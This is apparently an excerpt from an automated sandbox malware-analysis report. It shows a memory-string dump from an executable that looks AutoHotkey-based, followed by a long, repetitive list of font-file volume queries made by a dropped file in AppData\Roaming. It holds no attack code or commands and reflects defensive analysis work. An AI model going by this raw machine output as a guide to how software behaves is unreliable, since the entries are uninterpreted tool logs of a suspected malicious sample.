                    Source: kS2dqbsDwD.exe, 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmpBinary or memory string: regk-hookm-hook2-hooksjoypollPART%i-%i(no)%s%s%s%s%s%s{Raw}%s%cHotstring max abbreviation length is 40.LEFTLRIGHTRMIDDLEMX1X2WUWDWLWRSendInputuser32{Blind}{ClickLl{}^+!#{}RawTempSsASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt sc%03Xvk%02XALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUPRtlGetVersionntdll.dll%u.%u.%u...%s[%Iu of %Iu]: %-1.60s%s\:\:HKLMHKEY_LOCAL_MACHINEHKCRHKEY_CLASSES_ROOTHKCCHKEY_CURRENT_CONFIGHKCUHKEY_CURRENT_USERHKUHKEY_USERSREG_SZREG_EXPAND_SZREG_MULTI_SZREG_DWORDREG_BINARYDefault3264LineRegExFASTSLOWAscChrDerefHTMLModPowExpSqrtLogLnRoundCeilFloorAbsSinCosTanASinACosATanBitAndBitOrBitXOrBitNotBitShiftLeftBitShiftRightAddDestroyNamePriorityInterruptNoTimersTypeONLocalePermitMouseSendAndMouseMouseMoveOffPlayEventThenEventThenPlayYESNOOKCANCELABORTIGNORERETRYCONTINUETRYAGAINTimeoutMINMAXHIDEScreenRelativeWindowClientPixelCaretIntegerFloatNumberTimeDateDigitXdigitAlnumAlphaUpperLowerUTF-8UTF-8-RAWUTF-16UTF-16-RAWCPClipboardAllComSpecFalseProgramFilesTrueAhkPathAhkVersionAppDataAppDataCommonBatchLinesCaretXCaretYComputerNameControlDelayCoordModeCaretCoordModeMenuCoordModeMouseCoordModePixelCoordModeToolTipCursorDDDDDDDDDDefaultGuiDefaultListViewDefaultMouseSpeedDefaultTreeViewDesktopDesktopCommonEndCharEventInfoExitReasonFormatFloatFormatIntegerGuiControlEventGuiEventGuiHeightGuiWidthGuiXGuiYHourIconFileIconHiddenIconNumberIconTipIndexIPAddress1IPAddress2IPAddress3IPAddress4Is64bitOSIsAdminIsCompiledIsCriticalIsPausedIsSuspendedIsUnicodeKeyDelayKeyDelayPlayKeyDurationKeyDurationPlayLanguageLastErrorLineFileLineNumberLoopFieldLoopFileAttribLoopFileDirLoopFileExtLoopFileFullPathLoopFileLongPathLoopFileNameLoopFileShortNameLoopFileShortPathLoopFileSizeLoopFileSizeKBLoopFileSizeMBLoopFileTimeAccessedLoopFileTimeCreatedLoopFileTimeModifiedLoopReadLineLoopRegKeyLoopRegNameLoopRegSubKeyLoopRegTimeModifiedLoopRegTypeMDayMinMMMMMMMMMMonMouseDelayMouseDelayPlayMSecMyDocumentsNowNowUTCNumBatchLinesOSTypeOSVersionPriorHotkeyPriorKeyProgramsProgramsCommonPtrSizeRegViewScreenDPIScreenHeightScreenWidthScriptDirScriptFullPathScriptHwndScriptNameSecStartMenuStartMenuCommonStartupStartupCommonStoreCapslockModeThisFuncThisHotkeyThisLabelThisMenuThisMenuItemThisMenuItemPosTickCountTimeIdleTimeIdlePhysicalTimeSincePriorHotkeyTimeSinceThisHotkeyTitleMatchModeTitleMatchModeSpeedUserNameWDayWinDelayWinDirWorkingDirYDayYearYWeekYYYYRemoveClipboardFormatListenerAddClipboardFormatListenerTrayNo tray memstatus AHK_PlayMe modeclose AHK_PlayMe%s\%sRegClassAutoHotkey2Shell_TrayWndCreateWindoweditLucida ConsoleConsolasCritical Error: %s
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Users\user\AppData\Roaming\325.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
